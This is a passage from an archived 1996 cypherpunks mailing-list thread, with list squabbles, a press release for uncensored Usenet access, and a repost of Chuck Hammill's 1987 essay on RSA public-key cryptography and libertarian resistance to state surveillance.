iQCVAwUBMOs4u0UffSIjnthhAQEfigP9GQvgcyuCUxkrPqX/3yDdtwxDGajKbbhY
j90px4tr1Q1sNQue8ywBDdBIQakirTr95QDeGMrC1n0NjSh5+dotUUWiChWLCLS+
AMIsA3LCJr5BzeCOni8bYyz7+alt617cIIYZs0Unt26BKJVI20hU8OgD0oC9K/uR
7WN3YIKff0k=
=TuOD
-----END PGP SIGNATURE-----
Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server
Key fingerprint =  DD 39 66 3D AE DE 71 C2  B6 DA B2 3F 47 2A EB AC 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 4 Jan 1996 21:07:32 +0800
To: cypherpunks@toad.com
Subject: Re: test
In-Reply-To: <199601040247.UAA14402@dal1820.computek.net>
Message-ID: <XuH7gD28w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:

> test, please ignore - 1 copy sent.

Ed, I've pointed out to you during our mini-flame war that I've been getting
4 copies of your every e-mail: 2 via the cpunks list, 2 directly from your
box cc:'d to me. You _know_ that I've been getting 2 copies of cc:'s not
passing through toad.com, that the problem is at your end, and not at toad.com,
and you should _not_ send test posts to cypherpunks.

I'm sorry if your recent posting flurry was provoked by my question about what
you have contributed to this discussion besides puerile flames of Fred Cohen.

None of the following:
 * your test posts
 * your lack of understanding of anonymous remailers
 * your inability to configure sendmail
have any cryptographic relevance (other than to discredit your technical
knowledge, which you have done quite thoroughly :)

Please stop polluting this mailing list with test messages. Thank you.

(I wish I could set up procmail on this box.)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 4 Jan 1996 22:16:14 +0800
To: cypherpunks@toad.com
Subject: "Concryption"
Message-ID: <9601041355.AA16880@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Did I miss something in here about the alleged "Concryption" patent
awarded Security Dynamics Technologies?   Supposedly a press release
was posted to sci.crypt.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 4 Jan 1996 21:44:57 +0800
To: tallpaul@pipeline.com
Subject: Re: bumper stickers--WANNA BET???
Message-ID: <199601041329.IAA41784@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

tallpaul@pipeline.com *posted* to the entire list!

<snip> 

>I am not sure if I understand the political argument that J. Ray believes
>is so "RIGHT" that he wishes to post it to the cypherpunks list.

Er...did I post it to the list, and if I did, why didn't it appear
there? This was a *private* message to you, according to my logs.
Perhaps you should take a bit more care in responding to look at
the message headers before hitting the entire list automatically.
Private e-mail is, after all, still a possibility, even for the
cypherpunks...

<Blah blah blah writecode political stuff elided...>

>So attempts at solving complex social
>problems in the same way are *always* wrong, as witness J.Ray's original
>post to the group. 

Again, an offer of *proof* of my posting would be appropriate here.
The message you got wasn't PGPsigned, which is a good clue I did not
send it to the list. I hereby bet $10,000.00 e-cash [hell, I need the
money!] that I made NO such posting to the cypherpunks list. I believe
an apology (or a bet) is in order. Of course, I'm hoping for the bet.
Switch to decaf, tallpaul!
JMR

PS. to the list. Please try to learn the big difference between
their, they're, there, etc. The ghost of my former English teacher
groans and moans inside my head when I see these errors. Strunk &
White is short and to the point on the subject. The Ghost and I
thank you.

Regards, Jim Ray
 http://www.shopmiami.com/prs/jimray
             "Hooters GUYS? Washington -- GET A GRIP!"
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35  <liberty@gate.net>  IANAL
_______________________________________________________________________
Help Phil! e-mail zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMOvUHG1lp8bpvW01AQHbvgP+JR1gSBQvHu286IiWG+K4OGJi9NNcAHeY
u5DLnloHF8UvZ8D1b4uKB85z17iZVvSjGA1HS8SkZ6sxgwsHsv5ZrzI65Nenqb2d
vLbE1Ds9USmNBQAOtTs+dVUKkelpgbSLE9a2o8B866vT3lRPwluYSaHNX7CTHS67
/ZbTJ5qiP7E=
=X2kk
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 5 Jan 1996 12:13:59 +0800
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION ANNOUNCES PROMOTION FOR UNCENSORED ACCESS TO THE INTERNET
Message-ID: <199601041701.JAA09953@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Newsgroups: alt.censorship,comp.org.eff.talk,news.admin.censorship,alt.privacy,comp.privacy
Subject: COMMUNITY CONNEXION ANNOUNCES PROMOTION FOR UNCENSORED ACCESS TO THE INTERNET
From: Community ConneXion <admin@c2.org>

For Immediate Release - January 4, 1996
Contact: Sameer Parekh 510-601-9777x3

 COMMUNITY CONNEXION ANNOUNCES PROMOTION FOR UNCENSORED ACCESS TO THE
			       INTERNET

Berkeley, CA - In response to recent restrictions on Usenet material
made available to CompuServe customers, Community ConneXion, an
Internet privacy provider, today announced that has begun a promotion
to offer uncensored access to Usenet newsgroups at a discount to users
who have experienced censorship at the hands of their Internet service
provider, employer, or university.

"'The Internet views censorship as damage, and routes around
it,'" said Community ConneXion President Sameer Parekh, quoting
a famous saying on the net, "While a network provider, university,
or employer may want to limit the access their customers, students, or
employees may have to potentially controversial material on the
Internet, people need to realize that it is still possible for them to
access controversial material through alternative means. We're
making available services to make this fact obvious."

Community ConneXion offers full Internet access to its customers, with
no content-based restrictions on materials its customers may read or
make available on the Internet.  Community ConneXion has made
available one free month of service to users signing up for services
with Community ConneXion who are doing so in order to avoid content-
based restrictions instituted by their net provider, university, or
employer.

Customers who would like to take advantage of Community ConneXion's
uncensored access may continue to use their current provider for their
basic access, but to access the previously-unavailable materials they
may proxy through to the Community ConneXion servers. Parekh commented
on the ease with which people can bypass censorship instituted by
their provider or employer, "Providers, employers, and universities
may think that they are restricting access through their sites, but
given the ease with which people can set up an account with us, the
organizations trying to restrict access will soon realize that
censorship is hopeless."

Community ConneXion, founded in June of 1994, is the leading provider
of privacy on the Internet. They provide anonymous and pseudonymous
Internet access and web pages in addition to powerful web service,
virtual hosts, and web design consultation.  Information is available
from their web pages at http://www.c2.org/. More information on the
uncensored promotion is available at http://www.c2.org/uncensored/.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 5 Jan 1996 02:12:56 +0800
To: cypherpunks@toad.com
Subject: Re: "Deterrence"
Message-ID: <m0tXt3j-000952C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Recently, Kevin Wheeler (on NWLIBERTARIANS@TELEPORT.COM) expressed what I
consider to be odd (at least for him; I can easily deal with Benneth's crap)
(and a bit belated) objections to my desire to use technology to prevent
government from oppressing the public. 

If anybody "out there" wants to know "where I come from" on the subject of
using technology to thwart the state, it would be difficult to find a better
statement of the reasoning than the following, an essay written in 1987 by
Chuck Hammill titled "FROM CROSSBOWS TO CRYPTOGRAPHY:  THWARTING THE STATE
VIA TECHNOLOGY.   It is interesting to note, I think, that this essay
predates both the "fall of Communism" in 1989 as well as the writing of the
first version of PGP later.  It it further interesting to observe that in
the intervening time period, the main focus of the apparent threat to
freedom has shifted from those ex-communist nations to "Western" and
ostensibly "free nations'" governments.

I downloaded my copy from FIDOnet about 2.5 years ago, which due to the
limitations of that medium was cut up into chunks about 150 lines long.  The
message was originally signed with PGP, but due to this chopping operation
it is certain the signatures can't possibly match.  I also credit the person
who uploaded it to FIDO, Russell Whitaker.


+++++++++++++  re-print follows +++++++++++++

 Area: Liberty   Msg#: 480                                          Date:
04-28-93  04:06
  From: Libernet (russell E. Whit                    Read: Yes    Replied: No 
    To: All                                          Mark:                     
  Subj: From Crossbows to Cryptog

From: whitaker@eternity.demon.co.uk (Russell E. Whitaker)
Date: Tue, 27 Apr 93 23:51:02 BST
Cc:   ecfp@demon.co.uk

-----BEGIN PGP SIGNED MESSAGE-----

Please note that the following speech was made by Chuck Hammill
in 1987.  Address all letters to his address, given at the end
of this document.
     -- Russell

  FROM CROSSBOWS TO CRYPTOGRAPHY:  THWARTING THE STATE VIA
                     TECHNOLOGY

  Given at the Future of Freedom Conference, November 1987


     You   know,   technology--and   particularly   computer
technology--has often gotten a bad rap in  Libertarian  cir-
cles.  We tend to think of Orwell's 1984, or Terry Gilliam's
Brazil,  or  the  proximity  detectors keeping East Berlin's
slave/citizens on their own side of the border, or  the  so-
phisticated  bugging  devices  Nixon used to harass those on
his "enemies list."  Or, we recognize that for the price  of
a  ticket  on  the Concorde we can fly at twice the speed of
sound, but only if we first walk thru a magnetometer run  by
a  government  policeman, and permit him to paw thru our be-
longings if it beeps.

     But I think that mind-set is a mistake.   Before  there
were cattle prods, governments tortured their prisoners with
clubs  and  rubber  hoses.    Before  there  were lasers for
eavesdropping, governments used binoculars and  lip-readers.
Though  government certainly uses technology to oppress, the
evil lies not in the tools but in the wielder of the tools.

     In fact, technology represents one of the most  promis-
ing  avenues  available  for  re-capturing our freedoms from
those who have stolen them.  By its very nature,  it  favors
the  bright  (who can put it to use) over the dull (who can-
not).  It favors the adaptable (who are  quick  to  see  the
merit  of  the  new  (over  the sluggish (who cling to time-
tested ways).  And what two better words are  there  to  de-
scribe government bureaucracy than "dull" and "sluggish"?

     One  of  the  clearest,  classic triumphs of technology
over tyranny I see is  the  invention  of  the  man-portable
crossbow.   With it, an untrained peasant could now reliably
and lethally engage a target out to  fifty  meters--even  if
that  target  were  a mounted, chain-mailed knight.  (Unlike
the longbow, which, admittedly was more powerful, and  could
get  off  more shots per unit time, the crossbow required no
formal training to utilize.   Whereas the  longbow  required
elaborate  visual,  tactile  and kinesthetic coordination to
achieve any degree of accuracy, the wielder  of  a  crossbow
could simply put the weapon to his shoulder, sight along the
arrow  itself, and be reasonably assured of hitting his tar-
get.)

     Moreover, since just about  the  only  mounted  knights
likely  to  visit  your  average peasant would be government
soldiers and tax collectors, the utility of the  device  was
plain:    With it, the common rabble could defend themselves
not only against one another, but against their governmental
masters.   It was the  medieval  equivalent  of  the  armor-
piercing  bullet,  and, consequently, kings and priests (the
medieval equivalent of a  Bureau  of  Alcohol,  Tobacco  and
Crossbows)  threatened  death  and  excommunication, respec-
tively, for its unlawful possession.

     Looking at later developments, we  see  how  technology
like  the  firearm--particularly the repeating rifle and the
handgun, later followed by the Gatling gun and more advanced
machine guns--radically altered the balance of interpersonal
and inter-group power.  Not without reason was the Colt  .45
called "the equalizer."  A frail dance-hall hostess with one
in  her  possession  was  now  fully able to protect herself
against the brawniest roughneck in any saloon.    Advertise-
ments  for  the period also reflect the merchandising of the
repeating cartridge  rifle  by  declaring  that  "a  man  on
horseback,  armed with one of these rifles, simply cannot be
captured."  And, as long as his captors  were  relying  upon
flintlocks  or  single-shot rifles, the quote is doubtless a
true one.

     Updating now to  the  present,  the  public-key  cipher
(with  a  personal  computer to run it) represents an equiv-
alent quantum leap--in a defensive weapon.    Not  only  can
such  a technique be used to protect sensitive data in one's
own possession, but it can also permit two strangers to  ex-
change   information   over   an   insecure   communications
channel--a  wiretapped   phone   line,   for   example,   or
skywriting, for that matter)--without ever having previously
met  to  exchange cipher keys.   With a thousand-dollar com-
puter, you can create a cipher that  a  multi-megabuck  CRAY
X-MP  can't  crack in a year.  Within a few years, it should
be economically feasible to similarly encrypt voice communi-
cations; soon after that, full-color digitized video images.
Technology will not only have made wiretapping obsolete,  it
will  have  totally demolished government's control over in-
formation transfer.

     I'd like to take just a moment to sketch the  mathemat-
ics  which makes this principle possible.  This algorithm is
called the RSA algorithm, after Rivest, Shamir, and  Adleman
who  jointly created it.  Its security derives from the fact
that, if a very large number is  the  product  of  two  very
large  primes,  then it is extremely difficult to obtain the
two prime factors from analysis  of  their  product.    "Ex-
tremely"  in  the  sense that if primes  p  and  q  have 100
digits apiece, then their 200-digit product cannot  in  gen-
eral be factored in less than 100 years by the most powerful
computer now in existence.

     The  "public" part of the key consists of (1) the prod-
uct  pq  of the two large primes p and q, and (2)  one  fac-
tor,  call it  x  , of the product  xy  where  xy = {(p-1) *
(q-1) + 1}.  The "private" part of the key consists  of  the
other factor  y.

     Each  block of the text to be encrypted is first turned
into an integer--either by using ASCII,  or  even  a  simple
A=01,  B=02,  C=03, ... , Z=26 representation.  This integer
is then raised to the power  x (modulo pq) and the resulting
integer is then sent as the encrypted message.  The receiver
decrypts by taking this integer to the  (secret)  power    y
(modulo  pq).  It can be shown that this process will always
yield the original number started with.

     What makes this a groundbreaking development,  and  why
it  is  called  "public-key"  cryptography,"  is  that I can
openly publish the product  pq and the number   x   ,  while
keeping  secret  the number  y  --so that anyone can send me
an encrypted message, namely
                       x
                     a    (mod pq)  ,
but only I can recover the original message  a  , by  taking
what  they  send, raising it to the power  y  and taking the
result (mod pq).  The risky step (meeting to exchange cipher
keys) has been eliminated.  So people who may not even trust
each other enough to want to meet, may  still  reliably  ex-
change  encrypted  messages--each  party having selected and
disseminated his own  pq  and his  x  ,   while  maintaining
the secrecy of his own  y.

     Another benefit of this scheme is the notion of a "dig-
ital signature," to enable one to authenticate the source of
a given message.  Normally, if I want to send you a message,
I raise my plaintext  a  to your x and take the result  (mod
your pq)  and send that.

    However,  if in my message, I take the plaintext  a and
raise it to my (secret) power  y  , take the result  (mod my
pq), then raise that result to your x   (mod  your  pq)  and
send this, then even after you have normally "decrypted" the
message,  it  will still look like garbage.  However, if you
then raise it to my public power x   , and take  the  result
(mod  my public pq  ), so you will not only recover the ori-
ginal plaintext message, but you will know that no one but I
could have sent it to you (since no one else knows my secret
y).

     And these are the very concerns by the way that are to-
day tormenting the Soviet Union about the whole question  of
personal  computers.    On the one hand, they recognize that
American schoolchildren are right now growing up  with  com-
puters  as commonplace as sliderules used to be--more so, in
fact, because there are things computers can do  which  will
interest  (and instruct) 3- and 4-year-olds.  And it is pre-
cisely these students who one generation hence will be going
head-to-head against their Soviet  counterparts.    For  the
Soviets  to  hold  back might be a suicidal as continuing to
teach swordsmanship  while  your  adversaries  are  learning
ballistics.    On  the  other hand, whatever else a personal
computer may be, it is also an exquisitely efficient copying
machine--a floppy disk will hold upwards of 50,000 words  of
text,  and  can  be  copied in a couple of minutes.  If this
weren't threatening enough, the computer that  performs  the
copy  can also encrypt the data in a fashion that is all but
unbreakable.  Remember that in Soviet society  publicly  ac-
cessible  Xerox  machines are unknown.   (The relatively few
copying machines in existence  are  controlled  more  inten-
sively than machine guns are in the United States.)

     Now  the  "conservative" position is that we should not
sell these computers to the Soviets, because they could  use
them  in weapons systems.  The "liberal" position is that we
should sell them, in  the  interests  of  mutual  trade  and
cooperation--and  anyway,  if  we don't make the sale, there
will certainly be some other nation willing to.

     For my part, I'm ready to suggest that the  Libertarian
position should be to give them to the Soviets for free, and
if  necessary, make them take them . . . and if that doesn't
work load up an SR-71  Blackbird  and  air  drop  them  over
Moscow in the middle of the night.  Paid for by private sub-
scription, of course, not taxation . . . I confess that this
is not a position that has gained much support among members
of  the conventional left-right political spectrum, but, af-
ter all, in the words of one of Illuminatus's characters, we
are political non-Euclideans:   The shortest distance  to  a
particular  goal may not look anything like what most people
would consider a "straight line."    Taking  a  long  enough
world-view,  it is arguable that breaking the Soviet govern-
ment monopoly on information transfer could better  lead  to
the enfeeblement and, indeed, to the ultimate dissolution of
the Soviet empire than would the production of another dozen
missiles aimed at Moscow.

     But  there's  the rub:  A "long enough" world view does
suggest that the evil, the oppressive, the coercive and  the
simply  stupid  will "get what they deserve," but what's not
immediately clear is how the rest of  us  can  escape  being
killed, enslaved, or pauperized in the process.

    When  the  liberals and other collectivists began to at-
tack freedom, they possessed a reasonably  stable,  healthy,
functioning economy, and almost unlimited time to proceed to
hamstring   and   dismantle  it.    A  policy  of  political
gradualism was at least  conceivable.    But  now,  we  have
patchwork  crazy-quilt  economy held together by baling wire
and spit.  The state not only taxes us to  "feed  the  poor"
while also inducing farmers to slaughter milk cows and drive
up food prices--it then simultaneously turns around and sub-
sidizes research into agricultural chemicals designed to in-
crease  yields of milk from the cows left alive.  Or witness
the fact that a decline in the price of oil is considered as
potentially frightening as a comparable increase a few years
ago.  When the price went up,  we  were  told,  the  economy
risked  collapse for for want of energy.  The price increase
was called the "moral equivalent of war" and the Feds  swung
into  action.    For the first time in American history, the
speed at which you drive your car to work in the morning be-
came an issue of Federal concern.   Now, when the  price  of
oil  drops, again we risk problems, this time because Ameri-
can oil companies and Third World  basket-case  nations  who
sell  oil  may  not  be  able to ever pay their debts to our
grossly over-extended banks.  The suggested panacea is  that
government  should now re-raise the oil prices that OPEC has
lowered, via a new oil tax.  Since the government is seeking
to raise oil prices to about the same extent  as  OPEC  did,
what  can we call this except the "moral equivalent of civil
war--the government against its own people?"

     And, classically, in international trade, can you imag-
ine any entity in the world except  a  government  going  to
court  claiming  that  a  vendor  was  selling  it goods too
cheaply and demanding not only that that naughty  vendor  be
compelled by the court to raise its prices, but also that it
be punished for the act of lowering them in the first place?

     So  while the statists could afford to take a couple of
hundred years to trash our  economy  and  our  liberties--we
certainly  cannot  count  on  having an equivalent period of
stability in which to reclaim them.   I contend  that  there
exists  almost  a  "black  hole"  effect in the evolution of
nation-states just as in the evolution of stars.  Once free-
dom contracts beyond a certain  minimum  extent,  the  state
warps  the fabric of the political continuum about itself to
the degree that subsequent re-emergence of  freedom  becomes
all but impossible.  A good illustration of this can be seen
in the area of so-called "welfare" payments.  When those who
sup  at the public trough outnumber (and thus outvote) those
whose taxes must replenish the trough,  then  what  possible
choice has a democracy but to perpetuate and expand the tak-
ing  from  the few for the unearned benefit of the many?  Go
down to the nearest "welfare" office, find just  two  people
on  the dole . . . and recognize that between them they form
a voting bloc that can forever outvote you on  the  question
of who owns your life--and the fruits of your life's labor.

     So essentially those who love liberty need an "edge" of
some  sort  if  we're ultimately going to prevail.  We obvi-
ously  can't  use  the  altruists'  "other-directedness"  of
"work,  slave, suffer, sacrifice, so that next generation of
a billion random strangers can  live  in  a  better  world."
Recognize  that, however immoral such an appeal might be, it
is nonetheless an extremely powerful one in today's culture.
If you can convince  people  to  work  energetically  for  a
"cause," caring only enough for their personal welfare so as
to  remain  alive  enough  and  healthy  enough  to continue
working--then you have a truly massive reservoir  of  energy
to draw from.  Equally clearly, this is just the sort of ap-
peal which tautologically cannot be utilized for egoistic or
libertarian goals.  If I were to stand up before you tonight
and say something like, "Listen, follow me as I enunciate my
noble "cause," contribute your money to support the "cause,"
give  up  your  free  time  to  work for the "cause," strive
selflessly to bring it about, and then (after you  and  your
children are dead) maybe your children's children will actu-
ally  live under egoism"--you'd all think I'd gone mad.  And
of course you'd be right.  Because the point I'm  trying  to
make is that libertarianism and/or egoism will be spread if,
when, and as, individual libertarians and/or egoists find it
profitable and/or enjoyable to do so.    And  probably  only
then.

     While I certainly do not disparage the concept of poli-
tical  action, I don't believe that it is the only, nor even
necessarily the most cost-effective path  toward  increasing
freedom  in  our time.  Consider that, for a fraction of the
investment in time, money and effort I might expend in  try-
ing  to  convince  the  state to abolish wiretapping and all
forms of censorship--I can teach every libertarian who's in-
terested  how  to   use   cryptography   to   abolish   them
unilaterally.

     There  is  a  maxim--a proverb--generally attributed to
the Eskimoes, which very likely most Libertarians  have  al-
ready  heard.    And while you likely would not quarrel with
the saying, you might well feel that you've heard  it  often
enough already, and that it has nothing further to teach us,
and moreover, that maybe you're even tired of hearing it.  I
shall therefore repeat it now:

     If you give a man a fish, the saying runs, you feed him
for a day.  But if you teach a man how to fish, you feed him
for a lifetime.

     Your exposure to the quote was probably in some sort of
a  "workfare"  vs.  "welfare"  context;  namely, that if you
genuinely wish to help someone in need, you should teach him
how to earn his sustenance, not simply how to  beg  for  it.
And of course this is true, if only because the next time he
is hungry, there might not be anybody around willing or even
able to give him a fish, whereas with the information on how
to fish, he is completely self sufficient.

     But  I  submit  that this exhausts only the first order
content of the quote, and if there were nothing  further  to
glean  from  it,  I would have wasted your time by citing it
again.  After all, it seems to have almost a crypto-altruist
slant, as though to imply that we should structure  our  ac-
tivities  so  as  to  maximize  the  benefits to such hungry
beggars as we may encounter.

     But consider:

     Suppose this Eskimo doesn't know how to  fish,  but  he
does  know  how  to hunt walruses.   You, on the other hand,
have often gone hungry while traveling thru  walrus  country
because  you  had  no idea how to catch the damn things, and
they ate most of the fish you could catch.  And now  suppose
the  two  of  you  decide to exchange information, bartering
fishing knowledge for hunting knowledge.   Well,  the  first
thing  to  observe  is  that  a  transaction  of  this  type
categorically and unambiguously refutes the Marxist  premise
that  every  trade  must  have a "winner" and a "loser;" the
idea that if one person gains, it must necessarily be at the
"expense" of another person who loses.  Clearly, under  this
scenario, such is not the case.  Each party has gained some-
thing  he  did  not have before, and neither has been dimin-
ished in any way.  When it comes to exchange of  information
(rather  than material objects) life is no longer a zero-sum
game.  This is an extremely powerful notion.   The  "law  of
diminishing   returns,"   the  "first  and  second  laws  of
thermodynamics"--all those "laws" which constrain our possi-
bilities in other contexts--no longer bind us!   Now  that's
anarchy!

     Or  consider  another possibility:  Suppose this hungry
Eskimo never learned  to  fish  because  the  ruler  of  his
nation-state    had  decreed fishing illegal.   Because fish
contain dangerous tiny bones, and sometimes sharp spines, he
tells us, the state has decreed that their  consumption--and
even  their  possession--are  too  hazardous to the people's
health to be permitted . . . even by knowledgeable,  willing
adults.   Perhaps it is because citizens' bodies are thought
to be government property, and therefore it is the  function
of the state to punish those who improperly care for govern-
ment  property.    Or perhaps it is because the state gener-
ously extends to competent adults the "benefits" it provides
to children and to the mentally ill:  namely,  a  full-time,
all-pervasive supervisory conservatorship--so that they need
not  trouble  themselves  with making choices about behavior
thought physically risky or morally "naughty."  But, in  any
case,  you  stare stupefied, while your Eskimo informant re-
lates how this law is taken so seriously that  a  friend  of
his was recently imprisoned for years for the crime of "pos-
session of nine ounces of trout with intent to distribute."

     Now  you  may  conclude  that  a society so grotesquely
oppressive as to enforce a law of this  type  is  simply  an
affront to the dignity of all human beings.  You may go far-
ther  and  decide to commit some portion of your discretion-
ary, recreational time specifically to the task of thwarting
this tyrant's goal.  (Your rationale may be "altruistic"  in
the   sense   of  wanting  to  liberate  the  oppressed,  or
"egoistic" in the sense of  proving  you  can  outsmart  the
oppressor--or  very likely some combination of these or per-
haps even other motives.)

     But, since you have zero desire to become a  martyr  to
your "cause," you're not about to mount a military campaign,
or  even try to run a boatload of fish through the blockade.
However, it is here that technology--and in  particular  in-
formation technology--can multiply your efficacy literally a
hundredfold.    I say "literally," because for a fraction of
the effort (and virtually none of  the  risk)  attendant  to
smuggling in a hundred fish, you can quite readily produce a
hundred  Xerox copies of fishing instructions.  (If the tar-
geted government, like present-day America, at least permits
open  discussion  of  topics  whose  implementation  is  re-
stricted,  then that should suffice.  But, if the government
attempts to suppress the flow of information as  well,  then
you will have to take a little more effort and perhaps write
your  fishing manual on a floppy disk encrypted according to
your mythical Eskimo's public-key parameters.  But as far as
increasing real-world access to fish you have  made  genuine
nonzero  headway--which  may  continue to snowball as others
re-disseminate the information you have provided.   And  you
have not had to waste any of your time trying to convert id-
eological  adversaries, or even trying to win over the unde-
cided.  Recall Harry Browne's dictum  from  "Freedom  in  an
Unfree World" that the success of any endeavor is in general
inversely proportional to the number of people whose persua-
sion is necessary to its fulfilment.

     If  you  look  at  history, you cannot deny that it has
been dramatically shaped by men with names like  Washington,
Lincoln,  .  .  .  Nixon  .  . . Marcos . . . Duvalier . . .
Khadaffi . . .  and their ilk.  But it has also been  shaped
by  people with names like Edison, Curie, Marconi, Tesla and
Wozniak.  And this latter shaping has been at least as  per-
vasive, and not nearly so bloody.

     And  that's  where  I'm  trying  to  take The LiberTech
Project.  Rather than beseeching the state to please not en-
slave, plunder or constrain us, I propose a libertarian net-
work spreading  the  technologies  by  which  we  may  seize
freedom for ourselves.

     But here we must be a bit careful.  While it is not (at
present)  illegal  to  encrypt  information  when government
wants to spy on you, there is no guarantee of what  the  fu-
ture  may hold.  There have been bills introduced, for exam-
ple, which would have made it a crime  to  wear  body  armor
when government wants to shoot you.  That is, if you were to
commit certain crimes while wearing a Kevlar vest, then that
fact  would  constitute a separate federal crime of its own.
This law to my knowledge has not passed . . . yet . . .  but
it does indicate how government thinks.

     Other  technological  applications,  however, do indeed
pose legal risks.  We recognize, for  example,  that  anyone
who  helped a pre-Civil War slave escape on the "underground
railroad" was making a clearly illegal use of technology--as
the sovereign government of the United States of America  at
that time found the buying and selling of human beings quite
as  acceptable  as  the buying and selling of cattle.  Simi-
larly, during Prohibition, anyone who used  his  bathtub  to
ferment  yeast and sugar into the illegal psychoactive drug,
alcohol--the controlled substance, wine--was using  technol-
ogy  in a way that could get him shot dead by federal agents
for his "crime"--unfortunately not to be  restored  to  life
when  Congress  reversed itself and re-permitted use of this
drug.

     So . . . to quote a former President,  un-indicted  co-
conspirator  and pardoned felon . . . "Let me make one thing
perfectly clear:"  The LiberTech Project does not  advocate,
participate  in, or conspire in the violation of any law--no
matter how oppressive,  unconstitutional  or  simply  stupid
such  law may be.  It does engage in description (for educa-
tional and informational  purposes  only)  of  technological
processes,  and some of these processes (like flying a plane
or manufacturing a firearm) may well require appropriate li-
censing to perform legally.    Fortunately,  no  license  is
needed  for  the  distribution or receipt of information it-
self.

     So, the next time you look at the political  scene  and
despair,  thinking,  "Well,  if 51% of the nation and 51% of
this State, and 51% of this city have  to  turn  Libertarian
before  I'll  be  free,  then  somebody might as well cut my
goddamn throat now, and put me out of my  misery"--recognize
that  such  is not the case.  There exist ways to make your-
self free.

     If you wish to explore such techniques via the Project,
you are welcome to give me your name and address--or a  fake
name  and  mail  drop, for that matter--and you'll go on the
mailing list for my erratically-published newsletter.    Any
friends  or acquaintances whom you think would be interested
are welcome as well.  I'm not even asking for stamped  self-
addressed envelopes, since my printer can handle mailing la-
bels and actual postage costs are down in the noise compared
with  the  other  efforts  in getting an issue out.   If you
should have an idea to share, or even a  useful  product  to
plug,  I'll be glad to have you write it up for publication.
Even if you want to be the proverbial "free rider" and  just
benefit  from  what others contribute--you're still welcome:
Everything will be public domain; feel free to  copy  it  or
give it away (or sell it, for that matter, 'cause if you can
get  money  for  it while I'm taking full-page ads trying to
give it away, you're certainly entitled to  your  capitalist
profit . . .)  Anyway, every application of these principles
should make the world just a little freer, and I'm certainly
willing to underwrite that, at least for the forseeable  fu-
ture.

     I  will leave you with one final thought:  If you don't
learn how to beat your plowshares into  swords  before  they
outlaw  swords,  then you sure as HELL ought to learn before
they outlaw plowshares too.

                                       --Chuck Hammill

                                 THE LIBERTECH PROJECT
                                 3194 Queensbury Drive
                               Los Angeles, California
                                                 90064
                                          310-836-4157

                                    hammill@netcom.com

[The above LiberTech address was updated December 1992, with the
 permission of Chuck Hammill, by Russell Whitaker]

Those interested in the issues raised in this piece should participate
in at least these newsgroups:

                alt.privacy
                alt.security.pgp
                comp.org.eff.talk
                sci.crypt

A copy of the RSA-based public key encryption program, PGP 2.1 (Pretty
Good Privacy), can be obtained at various ftp sites around the world.
One such site is gate.demon.co.uk, where an MS-DOS version can be had by
anonymous ftp as pgp22.zip in /pub/pgp.

Versions for other operating systems, including UNIX variants
and Macintosh, are also available.  Source code is also
available.

Here's the blurb for PGP, by the way:

- ----------------------  Quote ----------------------------------------
PGP (Pretty Good Privacy) ver 2.2 - RSA public-key encryption freeware
for MSDOS, protects E-mail.  Lets you communicate securely with people
you've never met, with no secure channels needed for prior exchange of
keys.  Well featured and fast!  Excellent user documentation.

PGP has sophisticated key management, an RSA/conventional hybrid
encryption scheme, message digests for digital signatures, data
compression before encryption, and good ergonomic design.  Source
code is free.

Filenames:  pgp22.zip (executable and manuals), pgp22src.zip (sources)
Keywords:   PGP, Pretty Good Privacy, RSA, public key, encryption,
            privacy, authentication, signatures, email
- ---------------------- End Quote -------------------------------------

Russell Earl Whitaker                   whitaker@eternity.demon.co.uk
Communications Editor                                 AMiX: RWhitaker
EXTROPY: The Journal of Transhumanist Thought
Board member, Extropy Institute (ExI)

+++++++++++++

End of quoted material re-printed from FIDOnet.  Back to Jim Bell, here.
While I've tried to remove the various reformatting that FIDOnet did, there
is of course no way that I can return this file to its original state
matching the PGP signature.  I assume that most of the people/addresses
listed have changed, or could have changed, but the idea is the important thing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 4 Jan 1996 23:00:57 +0800
To: cypherpunks@toad.com
Subject: An apology to Jim Ray
Message-ID: <199601041437.JAA19955@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 04, 1996 08:28:11, 'liberty@gate.net (Jim Ray)' wrote a critique of
my post to the list concerning what turned out to be a private message to
me. 
 
J. Ray's points made in his critique are on-target and correct. 
 
My actions were not. 
 
I apologize to the people on the list for eating up their bandwidth in a
public response to a private e-message. 
 
